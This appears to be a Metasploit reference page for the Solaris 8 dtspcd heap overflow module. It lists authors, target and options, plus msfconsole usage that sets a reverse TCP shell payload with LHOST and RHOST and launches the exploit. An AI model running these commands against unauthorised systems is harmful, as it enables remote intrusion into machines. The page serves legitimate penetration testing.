Metasploit Penetration Testing Framework

Solaris dtspcd Heap Overflow

This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.

Rank

Great

Authors

noir < noir [at] uberhax0r.net >
hdm < hdm [at] metasploit.com >

References

Exploit Targets

0 - Solaris 8 (default)

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/solaris/dtspcd/heap_noir
msf exploit(heap_noir) > show payloads
msf exploit(heap_noir) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(heap_noir) > set LHOST [MY IP ADDRESS]
msf exploit(heap_noir) > set RHOST [TARGET IP]
msf exploit(heap_noir) > exploit

Module Options

RHOST	The target address
RPORT	The target port (default: 6112)
CHOST	The local client address
CPORT	The local client port
ConnectTimeout	Maximum number of seconds to establish a TCP connection
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
Proxies	Use a proxy chain
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session
TCP::max_send_size	Maxiumum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)

OSVDB:	CVE:
BID:	MSB:
TEXT: